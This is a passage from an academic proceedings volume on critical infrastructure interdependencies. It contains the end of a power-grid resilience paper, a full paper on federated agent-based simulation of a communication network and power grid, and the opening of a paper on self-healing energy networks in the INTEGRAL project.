This work has addressed the modeling of electric power systems and the quantitative assessment of the impact of failures through interdependencies between the cyber control infrastructure and the controlled electric grid. Building on the activity carried out in the European CRUTIAL project, and inspired by the failure scenarios identified there as critical, we have modeled an instance of EPS made up of a regional tele-operation system and the local control systems connected to it. Simulation analyses have been performed on a portion of the IEEE 118 Bus Test Case, to evaluate the user-perceived degradation of power demand satisfaction under varying failures and system conditions. Although the analyses shown exploit only partially the potential of the referred modeling and evaluation framework, the obtained results make it possible to understand some relevant dynamics of failure propagation and its impact through infrastructure interdependencies. Such insights can be usefully exploited towards proper system configurations enhancing resiliency and survivability. For example, the analysis of EPS under different stress levels is useful to find a proper configuration of the power grid so as to limit the overloading of power lines in case of failures. Also, understanding the effect of the repair times of the communication network makes it possible to better calibrate repair operations to enhance system availability. Future work includes an extension of the evaluation campaign by introducing other patterns of component failures, as well as enriching the set of measures of interest for the analyses. Currently, we are conducting evaluations to identify the most critical power lines for a given topology; this analysis makes it possible to understand which power lines are especially critical and need to be protected most.
Acknowledgment

This work has been partially supported by the European Community through the IST Project CRUTIAL [2] (Contract n. 027513).
References
1. Chiaradonna, S., Di Giandomenico, F., Lollini, P.: Evaluation of critical infrastructures: Challenges and viable approaches. In: De Lemos, R., Di Giandomenico, F., Gacek, C., Muccini, H., Vieira, M. (eds.) Architecting Dependable Systems V. LNCS, vol. 5135, pp. 52–77. Springer, Heidelberg (2008)
2. CRUTIAL: European Project CRUTIAL - Critical Utility Infrastructural Resilience (contract n. 027513), http://crutial.cesiricerca.it
3. Chiaradonna, S., Lollini, P., Di Giandomenico, F.: On a modeling framework for the analysis of interdependencies in electric power systems. In: IEEE/IFIP 37th Int. Conference on Dependable Systems and Networks (DSN 2007), Edinburgh, UK, June 2007, pp. 185–195 (2007)
4. Romani, F., Chiaradonna, S., Di Giandomenico, F., Simoncini, L.: Simulation models and implementation of a simulator for the performability analysis of electric power systems considering interdependencies. In: 10th IEEE High Assurance Systems Engineering Symposium (HASE 2007), pp. 305–312 (2007)
5. Dobson, I., Carreras, B.A., Lynch, V., Newman, D.E.: An initial model for complex dynamics in electric power system blackouts. In: 34th Hawaii Int. Conference on System Sciences (CD-ROM), Maui, Hawaii, 9 pages. IEEE, Los Alamitos (2001)
6. Chen, J., Thorp, J.S., Dobson, I.: Cascading dynamics and mitigation assessment in power system disturbances via a hidden failure model. Electrical Power and Energy Systems 27(4), 318–326 (2005)
7. Anghel, M., Werley, K.A., Motter, A.E.: Stochastic model for power grid dynamics. In: 40th Hawaii Int. Conference on System Sciences (CD-ROM), Waikoloa, Big Island, Hawaii, pp. 113–122. IEEE, Los Alamitos (2007)
8. Rinaldi, S.M., Peerenboom, J.P., Kelly, T.K.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Systems Magazine, 11–25 (December 2001)
9. Daly, D., Deavours, D.D., Doyle, J.M., Webster, P.G., Sanders, W.H.: Möbius: An extensible tool for performance and dependability modeling. In: Haverkort, B.R., Bohnenkamp, H.C., Smith, C.U. (eds.) TOOLS 2000. LNCS, vol. 1786, pp. 332–336. Springer, Heidelberg (2000)
10. Sanders, W.H., Meyer, J.F.: Stochastic activity networks: Formal definitions and concepts. In: Brinksma, E., Hermanns, H., Katoen, J.-P. (eds.) FMPA 2000. LNCS, vol. 2090, pp. 315–343. Springer, Heidelberg (2001)
Modeling and Simulation of Complex Interdependent Systems: A Federated Agent-Based Approach

Emiliano Casalicchio, Emanuele Galli, and Salvatore Tucci

University of Roma - Tor Vergata, Roma 00133, Italy
{emiliano.casalicchio,tucci}@uniroma2.it,
[email protected]

Abstract. Critical interdependent infrastructures are complex interdependent systems that, if damaged or disrupted, can seriously compromise the welfare of our society. This research, part of the CRESCO project, faces the problem of modeling and simulating interdependent critical infrastructures, proposing an agent-based solution. The approach we put forward, named Federated ABMS, relies on discrete agent-based modeling and simulation and on federated simulation. Federated ABMS provides a formalism to model compound complex systems, composed of interacting systems, as federations of interacting agents and sector-specific simulation models. This paper describes the formal model and outlines the steps that characterize the Federated ABMS methodology, here applied to a target system composed of a communication network and a power grid. Moreover, we conclude the paper with a thorough discussion of implementation issues.
1 Introduction
Much research on Critical Infrastructure Protection is committed to solving the challenging problem of interdependency modeling and analysis or, more generally, of modeling and simulation of critical interdependent infrastructures. While some research results are based on mathematical models [15,12,2,11,16,20], other solutions rely on discrete simulation (see [1] for an extended survey), on discrete agent-based simulation [10,17,3,18] and on SimCIP (http://www.irriis.org). This research, part of the CRESCO project, faces the problem of modeling and simulation of interdependent critical infrastructures proposing an approach based on discrete agent-based modeling and simulation and on federated simulation (Federated Agent-based Modeling and Simulation - Federated ABMS). The idea behind Federated ABMS is the following. A compound complex system, composed of interacting complex systems, can be modeled as a set of interacting agents. The behavior of each agent is modeled by a sector-specific model. Then, the whole model of the compound complex system is obtained by federating the agent-based models and the sector-specific models. The abstraction introduced by Federated ABMS relieves the modeler of the details of the complex system models (viewed as black boxes), allowing the modeler to concentrate her/his
attention on the modeling of the compound complex system and on the modeling of interdependencies. Another advantage of Federated ABMS is the possibility to simulate the agent behavior in greater detail by re-using sector-specific simulation models. The concept of Federated ABMS was previously introduced in [9], where the authors mainly discuss simulation and implementation issues and present preliminary results, without going into the details of the agent model and without providing details of the interdependencies model. As mentioned before, in the literature there are different research projects that propose agent-based modeling and simulation techniques to study critical interdependent infrastructures, or that aim at integrating existing simulation models to study the behavior of complex interdependent systems. In [10] the authors describe CIMS, an agent-based simulation framework to study critical interdependent infrastructures; the paper does not give details on how the agent-based modeling techniques were applied. In [17] the authors propose a critical infrastructure simulation framework that relies on agents, but they do not address the problem of how to model the detailed behavior of complex infrastructures. In [3] the authors propose an agent-based simulation model of critical infrastructures; the paper gives neither details on the interdependencies model nor on implementation aspects of the simulation framework. In [8] the authors investigate how to use agent-based modeling and simulation and UML to study critical infrastructure interdependencies. SimCIP is a simulation framework that relies on agent-based micro simulation and integrates different simulation models. In [19] the authors propose different modeling and simulation studies of telecom networks in case of emergencies or in disaster scenarios. This paper contributes to the literature as follows. First of all, we formalize the concept of federated agent-based modeling, providing a formalism to model compound complex systems composed of interacting systems. The introduced formalism makes it possible: i) to abstract the functional aspects of the infrastructure behavior, which is modeled in greater depth by re-using existing sector-specific models; ii) to model physical and cyber interdependencies as service exchange among infrastructures; iii) to model geographical and logical interdependencies as infrastructure perturbations. We then outline the steps that characterize the Federated ABMS methodology, and we show how to apply the methodology to a target system composed of a communication network and a power grid. Finally, we conclude with a thorough discussion of implementation issues. It is worth remarking that the proposed methodology is not intended as a direct support for decision makers, who need easy-to-use model composition and result visualization tools. Federated ABMS is intended as a modeling and simulation methodology for those who want to design and implement modeling and simulation tools for decision making. The paper is organized as follows. In Section 2 we introduce the federated agent-based modeling formalism and methodology. In Section 3 we explain how Federated ABMS can be applied to a simple case study. In Section 4 we discuss implementation issues of Federated ABMS. Section 5 concludes the paper.
2 Agent-Based Modeling of Interdependent Complex Systems
As shown in many research works, agents can be used to model interdependent complex systems (e.g. [13]). A general definition of agent is the following [4]:

Definition 1. An agent is an entity with a location, capabilities and memory. The entity location defines where it is in a physical space ... What the entity can perform is defined by its capabilities ... the experience history (for example, overuse or aging) and data defining the entity state represent the entity's memory.

A critical infrastructure is characterized by its location, its behavior, its interaction capabilities and its internal state. A critical infrastructure can therefore be modeled as an autonomous agent, and the system composed of interdependent critical infrastructures can be modeled as interacting agents which cooperate and/or compete to realize a common or an individual goal.
2.1 The Federated Agent-Based Model
An agent a is described by the tuple (V_a, S_a, X_a), where:
1. V_a = {v_1^a, ..., v_{N_v^a}^a}, with v_i^a ∈ V_i^a and |V_a| = N_v^a, is the set of the agent attributes, where V_i^a is the domain of the agent attribute i. The values assumed by the agent attributes at time t represent the state of the agent.
2. S_a = {s_1^a, ..., s_{N_s^a}^a}, with |S_a| = N_s^a, is the set of services that the agent a provides to other agents. In our model agents interact by exchanging services.
3. X_a = {x_1^a, ..., x_{N_x^a}^a}, with |X_a| = N_x^a, is the set of inputs of the agent a. Inputs can be services produced by other agents or perturbations. A perturbation is an unpredictable event that modifies the agent state and alters the behavior of the agent a, reducing a's capability to provide services. An input is characterized by the tuple x_i^a = (t_x, x), where x ∈ X_i^a is the value of the input, X_i^a is the set of possible values for the i-th input of agent a, and t_x is the time at which the value x is available (t_x ∈ R+ or t_x ∈ N+ if we consider continuous or discrete time, respectively).
Comparing the proposed federated agent-based model with Definition 1, we have that:
1. the agent state, memory and location are modeled by the agent attributes V_a;
2. S_a and X_a model the capability of the agent to interact with other agents, providing services and consuming data or services;
3. the agent behavior, which determines how inputs are processed, how services are provided and how the agent state evolves, is modeled using a sector-specific model of the complex system being modeled.
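A direct, purely illustrative transcription of the tuple (V_a, S_a, X_a); the concrete types are our assumptions.

from dataclasses import dataclass
from typing import Callable, Dict, Tuple

TimedInput = Tuple[float, object]             # x_i^a = (t_x, x)
Service = Callable[..., Tuple[float, float]]  # returns (t, QoS level in [0, 1])

@dataclass
class Agent:
    attributes: Dict[str, object]  # V_a: values at time t form the agent state
    services: Dict[str, Service]   # S_a: services offered to other agents
    inputs: Dict[str, TimedInput]  # X_a: consumed services and perturbations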
Fig. 1. The federated agent-based model

Fig. 2. The federated agent model of a complex interdependent system composed of the power grid (left) and of the communication network (right)
Figure 1 shows the proposed federated agent model. It is worth noting that only the agent a can interact directly with the detailed model of the complex system abstracted by a. Let us now define the relationship among agent attributes, services and inputs. The agent state V_a is a function of the time and of the agent inputs X_a, and implicitly of the agent behavior (as will be explained in the following). Assuming that the time is discrete, t ∈ N+, and that each agent attribute v_i^a depends on a subset {x_{j_1}^a, ..., x_{j_n}^a} of the agent inputs, we have:

v_i^a = f_i^a(t, x_{j_1}^a, ..., x_{j_n}^a),   f_i^a : N+ × X_{j_1}^a × ... × X_{j_n}^a → V_i^a.

The dependency of the agent attributes on the agent inputs is defined by the mapping¹

M_a = {m_{i,j}}^{N_x^a × N_v^a},   m_{i,j} = 1 if x_i^a ∈ dom(f_j^a), 0 otherwise.   (1)

It is important to remark that f_i^a and M_a depend on the specific system modeled and on the specific goal of the modeling and simulation study; it is therefore impossible to provide a generic expression for them. In Section 3 we give an example of f_i^a and M_a. The service s_i^a is a function of the time, of the agent state, of the agent inputs and of a set of service input parameters p_1^{i,a}, ..., p_{N_p^{i,a}}^{i,a}, with p_j^{i,a} ∈ P_j^{i,a}:

s_i^a = g_i^a(t, v_{j_1}^a, ..., v_{j_n}^a, p_1^{i,a}, ..., p_{N_p^{i,a}}^{i,a}),   g_i^a : N+ × V × P → N+ × [0, 1],

where V = V_{j_1}^a × ... × V_{j_n}^a and P = P_1^{i,a} × ... × P_{N_p^{i,a}}^{i,a}.

¹ dom(f) is the domain of the function f and cod(f) the co-domain of the function f.
In our model we assume that s_i^a = (t, 1) if the i-th service, invoked at time t′, is delivered at time t ≥ t′. On the contrary, s_i^a = (t, 0) if the service cannot be delivered. In the latter case the time t is meaningless or, depending on the specific service, it can be interpreted as the service timeout. The proposed on-off model of service delivery can be extended by considering that s_i^a can be provided at different QoS levels s, 0 ≤ s ≤ 1: the QoS level s = 0 means that the service is not delivered, and the QoS level s = 1 means that the service is delivered at 100% of the QoS level. The last step toward the definition of a federated agent-based model is to provide a solution for (i) a model of the agent state evolution, (ii) a model of service delivery and (iii) a model of the service delivery time. We address issues (i)-(iii) using a detailed model of the target complex system. The innovative idea we introduce is to consider the detailed system model as a black box that is controlled by the agent model and that computes the new system state, the service delivery times and the service levels. The interaction between the agent model and the detailed system model (see Figure 1) works as follows. The agent model asks the detailed system model to compute the new system state V′_a on the basis of the actual agent state V_a and of the requested services S_a.req. The service response and the service delivery time are computed by the detailed system model and returned in S_a.resp. In the proposed solution the agent model plays the role of the orchestrator of the simulation, while the detailed system model plays the role of a simulation component that receives, from the orchestrator, the system workload (V_a, S_a.req).
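Reusing the Agent sketch given earlier, the exchange can be condensed into a single step function. This is illustrative: step is a stand-in for whatever interface the wrapped simulator exposes (e.g. an OMNeT++ run or a load-flow solve).

def agent_step(agent, detailed_model, requests):
    # The agent hands (V_a, S_a.req) to the black box and receives
    # (V'_a, S_a.resp) back, as in Figure 1.
    new_state, responses = detailed_model.step(agent.attributes, requests)
    agent.attributes = new_state  # V_a <- V'_a
    return responses              # each response is a (t, QoS level) pair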
2.2 Interconnecting Agents: The Interdependencies Model
Interdependencies can be classified as [15]: physical, geographical, cyber, and logical. In our model, physical and cyber interdependencies are modeled as service exchange, while the concept of perturbation makes it possible to model geographical and logical interdependencies. In this work we concentrate our attention on cyber and physical interdependencies. Two agents a and b interact if there is at least one service provided by a that is an input for b: s_i^a(t) = x_j^b(t) for some 1 ≤ i ≤ N_s^a and 1 ≤ j ≤ N_x^b. In this case the agent b depends on the behavior and on the services provided by a, so a and b are interdependent. If a depends on b and b on a we have cyclic interdependencies, and if a and b do not interact directly but interact through a chain of agent interactions we can say that a and b are indirectly interdependent. The interdependencies between agents a and b are then modeled by the mappings:

Q_{a,b} = {q_{i,j}}^{N_s^a × N_x^b},   q_{i,j} = 1 if s_i^a = x_j^b, 0 otherwise,   (2)

and M_b (defined in equation 1). The mapping Q_{a,b} defines how a and b interact, while the mapping M_b defines how b's state is influenced by b's inputs. In the
same way, cyclic interdependencies can be described by the four mappings Q_{a,b}, M_b, Q_{b,a} and M_a.
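Equation (2) translates into a tiny constructor. The representation below (0/1 lists and name-based wiring) is our choice, not the paper's.

def interdependency_matrix(services_a, inputs_b, wiring):
    # q_ij = 1 iff service s_i of agent a feeds input x_j of agent b;
    # wiring is the set of (service name, input name) connections.
    return [[1 if (s, x) in wiring else 0 for x in inputs_b] for s in services_a]

# e.g. a power grid service feeding the supply input e1 of the network agent:
Q = interdependency_matrix(["s1"], ["e1", "e2", "o1"], {("s1", "e1")})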
2.3 The Federated ABMS Methodology
The steps toward the definition of a federated agent-based model are the following:
1. Identification of the simulation study goals.
2. Identification of the complex systems (e.g. infrastructures) that compose the compound complex system under study.
3. For each component system identified in step 2, identify: (a) the set of variables that are representative of the system state; (b) the set of services that represent the interaction of the complex system with the other component systems, with the environment and with human beings; (c) the set of perturbations and inputs that influence the component system behavior; (d) the relationships among agent inputs and agent state variables. Steps (a)-(c) should be supported by a series of interviews with infrastructure experts.
4. Associate an agent a with each system identified in step 3 and define the related agent model (V_a, X_a, S_a) and M_a. V_a, X_a, S_a and M_a are determined in steps 3.(a)-3.(d), respectively.
5. For each agent defined in the previous step, identify the sector-specific simulation model useful to simulate the infrastructure behavior.
6. Identify the system interdependencies, for example through interviews with infrastructure experts.
7. For each pair of infrastructures a and b (a ≠ b), define the interdependency matrix Q_{a,b}.
3 The Case Study
In the following we apply the federated agent-based methodology to a target complex system composed of an IP communication network (cn) and of a power grid (pg). We suppose that the communication network depends on the power grid and that there are no auxiliary power mechanisms. For lack of space we concentrate our attention on steps 4 and 7 described above. The network state V_cn is represented by {n_1, ..., n_m, l_1, ..., l_r}, where n_i is a network node (router, access point, switch, ...) and l_j is a network link connecting two network nodes; m is the number of nodes and r the number of links. We assume that n_i = 1 (l_i = 1) if the node (link) i works and n_i = 0 (l_i = 0) if the node (link) i does not work. The agent inputs are X_cn = {e_1, ..., e_m, o_1, ..., o_{m+p}}, where e_i models the power supply (electricity) for the network node n_i and o_i models an unpredictable system outage for the network node n_i (or link l_i). e_i = 0 means that the node n_i
cannot be supplied by the power grid; o_i = 1 means that n_i (l_i) has experienced an outage and cannot work. The mapping M_cn that models the dependencies of the state variables on the agent inputs is the block matrix whose first m rows (the inputs e_1, ..., e_m) are [I_m | 0_p] and whose remaining m+p rows (the inputs o_1, ..., o_{m+p}) are I_{m+p}, the columns corresponding to the state variables n_1, ..., n_m, l_1, ..., l_p; here I_m is an m × m identity matrix and 0_p is a p × p null matrix. In our simplified model the relationship f_cn among the agent inputs and the agent state is modeled by the following function:

f_cn:  n_i = 0 if (e_i = 0) or ((e_i = 1) and (o_i = 1)), ∀t
       l_i = 0 if o_i = 1, ∀t
       n_i = 1, l_i = 1 otherwise, ∀t

The service provided by the communication network is "send a message from n_i to n_j", where n_i and n_j are two network access points. Our simplified network model therefore provides only one service s with two input parameters p_1 and p_2, where p_1 is the source node and p_2 is the destination node. s = (t_R, 1) if the message is delivered at time t_R (the service response time), and s = (·, 0) if the service cannot be delivered because of the internal state of the communication network, given by the values of {n_1, ..., n_m, l_1, ..., l_p}. To determine the internal state evolution of the communication network on the basis of the agent inputs and service requests we use an event-driven network simulation model implemented using OMNeT++ (http://www.omnetpp.org). Figure 2 (right) shows the connection between the agent model and the detailed network simulation model. The power grid model considers the following components: power generators (or generation plants) pg, primary cabins pc, secondary cabins sc and distribution/transmission lines d. The power grid state is thus modeled by the set of attributes V_pg = {pg_1, ..., pg_n, pc_1, ..., pc_r, sc_1, ..., sc_q, d_1, ..., d_z}, where: pg_k = 1 if the generator k works properly and pg_k = 0 otherwise; pc_k = 1 if the primary cabin k works properly and pc_k = 0 otherwise; sc_k = 1 if the secondary cabin k works properly and sc_k = 0 otherwise; and d_k = 1 if the distribution or transmission line k works properly and d_k = 0 otherwise. There are many external factors that can influence the power grid behavior; however, for simplicity, we consider only faults {y_1, ..., y_u}, u = n + r + q + z. If y_k = (t, 1), the power grid component k will experience a fault at time t. Otherwise, if y_k = (t, 0), the component k does not experience any outage, or it is repaired at time t after a fault at time t′ < t.
Then we can define M_pg = {m_{i,j}}^{u×u} = I_{u×u} and

f_pg:  v_i = 0 if y_i = 1, ∀t
       v_i = 1 otherwise, ∀t

where v_i is a power grid component pg_i, pc_i, sc_i or d_i. The service provided by the power grid is "provide the electricity to the secondary cabin sc_k". We assume that the load is attached directly to the secondary cabins through a bus. We then have q services: s_j = (t, 1) if the secondary cabin sc_j is operative at time t, and s_j = (·, 0) otherwise. The value of s_j depends on the state of all the power grid components (generators, primary cabins and links). In the CRESCO project the power grid behavior is modeled using a load flow model (that is, a time-independent model). At time t the power grid simulation model receives as input V_pg and recomputes the power flow, producing the new values V′_pg for the model state. The interdependencies between the power grid and the communication network, identified in step 6, are defined by the mapping

Q_{pg,cn} = {q_{i,j}}^{N_s^pg × N_x^cn},   q_{i,j} = 1 if s_i = e_j, 0 otherwise,

and by M_cn as previously defined. For simplicity and for lack of space we do not model the power grid control functionalities, that is, the dependency of the power grid on the communication network.
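The rule f_cn defined above is small enough to execute directly; the following sketch assumes 0/1 dicts keyed by component identifiers.

def f_cn(node_ids, link_ids, e, o):
    # A node is down when its power supply is missing or it suffered an
    # outage; a link is down after an outage (cf. the definition of f_cn).
    n = {i: 0 if (e[i] == 0 or o[i] == 1) else 1 for i in node_ids}
    l = {j: 0 if o[j] == 1 else 1 for j in link_ids}
    return n, l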
4 Implementation Issues
The implementation of a federated agent-based simulation model is a challenge, and there are many open issues, to mention a few: model validation, experiment reproducibility, extensibility to diverse and unforeseen scenarios, simulation scalability, and the implementation of federations of agents and simulation models. In the following we discuss the last two issues in detail.
4.1 Implementation of Agents
In the literature the problem of discrete agent simulation is widely addressed, and there are different frameworks that support agent and multi-agent simulation; examples are RePast [14], JadeSIM [5] and SIM_AGENT [6]. All these approaches have their advantages and disadvantages. Distributed agents (e.g. JadeSIM) make it possible to design scalable simulation models, and some of them are compliant with distributed simulation standards, but they introduce difficulties in designing and testing the simulation logic. Frameworks such as RePast do not use distributed agents, thus facilitating the design and testing of the simulation logic but limiting the simulation scalability. However, Federated ABMS is independent of the technology used to implement agents. In our prototype we have decided to use RePast as the discrete agent simulation framework.
4.2 Federation of the Agent-Based Model(s) and Sector Specific Models
The implementation of the proposed federated agent-based simulation model requires the use of distributed simulation technologies. Distributed simulation makes it possible to integrate heterogeneous simulation models that can be distributed worldwide or locally; moreover, it enables the execution of huge simulations. If a distributed agent technology is used (see Figure 3) we have, for each infrastructure, a federation composed of the agent model and of the sector-specific simulation model (or more than one, if needed). The federated agent-based simulation model is obtained by federating all these federations into a single federation, the Critical Interdependent Infrastructures Federation. If a centralized agent-based simulation framework is used, the framework interacts with all the sector-specific simulation models (see Figure 4), while the agents interact among themselves using method invocations. The agent-based simulation framework has a unique federate ambassador, which manages the interaction between each agent and the related sector-specific simulation models. Our prototype relies on HLA, the distributed simulation standard. We have used the poRTIco implementation [7] of the HLA interfaces, and we have modified both the RePast scheduler and the OMNeT++ scheduler to enable the interaction with poRTIco. Then we have implemented the federate ambassador for both models. The load flow simulator used to model the power grid is a static simulation model, so its integration with poRTIco was straightforward.
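The role of a federate ambassador can be illustrated with a Python stand-in. This deliberately does not reproduce the real poRTIco/IEEE 1516 API, which is Java/C++ and far richer; class, method and hook names here are ours.

class FederateAmbassador:
    # Minimal stand-in for the HLA callback interface.
    def reflect_attribute_values(self, object_id, attributes): ...
    def receive_interaction(self, interaction, parameters): ...

class AgentFederate(FederateAmbassador):
    def __init__(self, agent):
        self.agent = agent

    def reflect_attribute_values(self, object_id, attributes):
        # A sector-specific federate published an updated state V'_a:
        # fold it back into the agent model's attributes.
        self.agent.attributes.update(attributes)

    def receive_interaction(self, interaction, parameters):
        # Service responses S_a.resp arrive as interactions; on_response
        # is a hypothetical hook on the agent model.
        self.agent.on_response(interaction, parameters)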
4.3 Interaction between the Agent Model and the Sector Specific Model
The design of the interaction between an agent-based model and the related sector-specific model is one of the main challenging problems.

Fig. 3. The distributed agents implementation. FA is the federate ambassador, A the agent model, DM the sector specific simulation model and FDD the FOM Data Document.

Fig. 4. The centralized agents implementation. FA is the federate ambassador, A the agent model, DM the sector specific simulation model and FDD the FOM Data Document.
Two aspects have to be considered: the implementation of the physical interaction between models, and the implementation of the logical relationship between the agent state and inputs (V_a and X_a) and the state variables and parameters of the detailed simulation models. In HLA terminology, the physical interaction is defined by the Federation Object Model (FOM). The agent model publishes, as objects, the inputs X_a and the state variables V_a, while the sector-specific model publishes V′_a as an object and S_a as an interaction. The logical relationship is implemented on the agent side: the agent implements the function f_a and the mapping M_a. Each time an agent state variable changes its value, the agent model changes the value of the related sector-specific model variable. For example, if the network node n_i is a router and n_i = 0 at time t, the agent modifies, at time t, the router object published by the OMNeT++ federate.
4.4 Orchestration of the Federated Agent-Based Simulation Model
A distributed application needs an orchestrator process that manages the application logic, and a distributed simulation needs a process that manages the simulation logic; we name the latter the simulation orchestrator. In federated agent-based modeling and simulation, the agent model plays the natural role of the simulation orchestrator. If a centralized agent-based simulation framework is used, the simulation orchestrator can be implemented easily. For example, in RePast, where each agent is implemented by a Java class, the simulation orchestrator is implemented by the model class that coordinates the setup and running of the agent model. On the other hand, if distributed agents are used, a specific agent that works as the simulation orchestrator has to be designed.
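In the centralized case the simulation orchestrator reduces to a plain loop over the agents and their sector-specific models. The sketch below uses our own names throughout (pending_requests and apply are hypothetical hooks).

def simulation_orchestrator(pairs, t_end, dt=1.0):
    # pairs: list of (agent, detailed_model) couples; at every step each
    # agent exchanges its state and service requests with its model.
    t = 0.0
    while t < t_end:
        for agent, model in pairs:
            new_state, responses = model.step(agent.attributes,
                                              agent.pending_requests())
            agent.attributes = new_state
            agent.apply(responses, t)
        t += dt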
5 Concluding Remarks
This paper has argued for an alternative agent-based modeling and simulation approach to the study of interdependent complex systems. The proposed methodology, which capitalizes on the advantages of ABMS and of distributed simulation, is intended as an aid for those who face the challenging task of designing a simulation framework for the analysis of interdependent complex systems. With Federated ABMS a modeler can define an abstract model of the target compound complex system while ignoring the details of the component system models (which are used as black boxes). This abstraction allows the modeler to concentrate her/his effort on modeling the whole complex system and the system interdependencies. Moreover, the use of distributed simulation makes it possible to build scalable simulation models. However, the proposed solution has some limitations. First of all, the interdependencies model has to be improved to provide a more sophisticated formalism to model geographical and logical interdependencies. Furthermore, model validation mechanisms have not yet been investigated.
Acknowledgment

This work is partially supported by the CRESCO Project under contract num. ENEA/2007/1303/FIM-INFO-AFU, but it does not necessarily represent the official position of the project itself or of its partners. The authors are solely responsible for the views, results and conclusions contained in this work.
References
1. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependencies Modeling: A Survey of US and International Research. Idaho National Laboratory (2006)
2. Asavathiratham, C., Roy, S., Lesieutre, B., Verghese, G.: The influence model. IEEE Control Systems Magazine (2001)
3. Balducelli, C., Bologna, S., Di Pietro, A., Vicoli, G.: Analysing interdependencies of critical infrastructures using agent discrete event simulation. Int. J. Emergency Management 2(4) (2005)
4. Bonabeau, E.: Agent-based modelling: Methods and techniques for simulating human systems. In: Proc. of the National Academy of Sciences of the United States of America (2002)
5. Gianni, D.: Bringing discrete event simulation concepts into multi-agent systems. In: 10th Int. Conference on Computer Modeling and Simulation. IEEE Comp. Soc., Los Alamitos (2008)
6. Sloman, A., Logan, B.: Building cognitively rich agents using the SIM_AGENT toolkit. Communications of the ACM 42(3) (1999)
7. The poRTIco Project, http://www.porticoproject.org
8. Cardellini, V., Casalicchio, E., Galli, E.: Agent-based modeling of interdependencies in critical infrastructures through UML. In: ADS 2007: Spring Simulation Multiconference 2007/Agent Discrete Simulation 2007, Norfolk, VA, USA (2007)
9. Casalicchio, E., Galli, E., Tucci, S.: Federated agent-based modeling and simulation approach to study interdependencies in IT critical infrastructures. In: DS-RT 2007: Proceedings of the IEEE International Symposium on Distributed Simulation and Real-Time Applications (DS-RT 2007), Chania, Crete, Greece. IEEE Computer Society, Los Alamitos (2007)
10. Dudenhoeffer, D., Permann, M., Manic, M.: CIMS: A framework for infrastructure interdependency modeling and analysis. In: Proceedings of the Winter Simulation Conference, WSC 2006, December 3-6, pp. 478–485 (2006)
11. Gursesli, O., Desrochers, A.: Modeling infrastructure interdependencies using Petri nets. In: Proc. of Int'l Conf. on Systems, Man and Cybernetics (October 2003)
12. Haimes, Y., Jiang, P.: Leontief-based model of risk in complex interconnected infrastructures. Int'l Journal of Infrastructure Systems (2001)
13. North, M.J., Macal, C.M.: Managing Business Complexity: Discovering Strategic Solutions with Agent-Based Modeling and Simulation. Oxford University Press, Oxford (2007)
14. North, M., Collier, N., Vos, J.: Experiences creating three implementations of the Repast agent modeling toolkit. ACM Trans. Model. Comput. Simul. 16(1), 1–25 (2006)
15. Rinaldi, S., Peerenboom, J., Kelly, T.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Systems 21(6), 11–25 (2001)
16. Svendsen, N.K., Wolthusen, S.D.: Multigraph dependency models for heterogeneous infrastructures, ch. 23, pp. 337–350. Springer, Heidelberg (2007)
17. Panzieri, S., Setola, R., Ulivi, G.: An agent based simulator for critical interdependent infrastructures. In: Proc. of Securing Critical Infrastructures Conf. (October 2004)
18. Gianni, D., Loukas, G., Gelenbe, E.: A simulation framework for the investigation of adaptive behaviours in largely populated building evacuation scenarios. In: The International Workshop on Organised Adaptation in Multi-Agent Systems, at AAMAS 2008 (2008)
19. Jrad, A., O'Reilly, G., Richman, S.H., Conrad, S., Kelic, A.: Dynamic changes in subscriber behavior and their impact on the telecom network in case of emergency. In: Proc. of Military Communication Conference (MILCOM 2006) (2006)
20. Zhang, P., Peeta, S., Friesz, T.: Dynamic game theoretic model of multilayer infrastructure networks. Networks and Spatial Economics 5 (2005)
Self-healing and Resilient Critical Infrastructures

Rune Gustavsson and Björn Ståhl

Blekinge Institute of Technology
[email protected],
[email protected]

Abstract. The paper describes methods and tools addressing self-healing and resilience of critical infrastructures, specifically power and information networks. Our case study is based on challenges addressed in the ongoing EU project INTEGRAL, which aims at integrating DER/RES in cell-based virtual utilities. We propose two experimental environments, EXP II and INSPECT, to support a structured approach to identifying, implementing and monitoring suitable self-healing mechanisms, thereby increasing the resilience of our systems. Our approach is based on our own results from earlier EU projects and on selected approaches from other international projects, such as NSF GENI in the US and EU efforts such as SmartGrids and ARECI.

Keywords: self-healing, resilience, critical infrastructures, interfaces, experiments
1 Background
The investigation of enabling technologies for the design and maintenance of future energy systems is the focus of several ongoing international R&D projects. An identified challenge is related to integrating a vast amount of Renewable Energy Sources (RES) as Distributed Energy Resources (DER). One of the international projects addressing related challenges is the EU funded SmartGrids Technological Platform¹. The project INTEGRAL² is an EU STREP project conducted within the SmartGrids umbrella and a follow-up to the two earlier EU projects CRISP³ and MicroGrids⁴. According to the Strategic Research Agenda (SRA) of SmartGrids, standardization, modularization and programmable functionality will enable an economy of scale for future power systems, potentially leading to lower costs of operations and more expandable systems. Instrumental in this regard is the proper design and maintenance of multidirectional communication and control systems enabling horizontal and vertical integration of system components.
3 4
http://www.smartgrids.eu The work reported is partially supported by the EU project FP6-038576, Integrated ICT-platform based distribution control in electricity grids with a large share of distributed energy resources and renewable energy-sources. Started November 2007. Distributed intelligence in critical infrastructures for sustainable power: http://crisp.ecn.nl http://microgrids.power.ece.ntua.gr
and DG in system operation, resulting in effective distribution control for the benefit of power quality and reliability enhancement at the connection point. The INTEGRAL project addresses some of these challenges through the following steps:
1. Define Integrated Distributed Control as a unified and overarching concept for coordination and control, not just of individual DER devices, but at the level of large-scale DER/RES aggregations.
2. Show how this can be realized by common industrial, cost-effective, standardized, state-of-the-art ICT platform solutions.
3. Demonstrate its practical validity via three field demonstrations (A, B and C) covering the full range of operating conditions, including:
(a) Normal operating conditions of DER/RES aggregations, showing their potential to reduce grid power imbalances, optimize local power and energy management, minimize cost, etc.
(b) Critical operating conditions of DER/RES aggregations, showing stability also in integrated grids.
(c) Emergency operating conditions, showing self-healing capabilities of DER/RES aggregations.
The expected results of the project are a portfolio of important operational aspects of how to run DER/RES integrated with the grid, in particular:
– Self-healing, fault handling and automatic grid reconfiguration in the presence of a large number of DER/RES.
– Optimality of autonomous DER/RES islanded operations in interaction with higher levels of the grid.
– System-level security and protection of DER/RES distributed control information and actions.
– Balancing and trade services with the help of DER/RES clusters of cells.
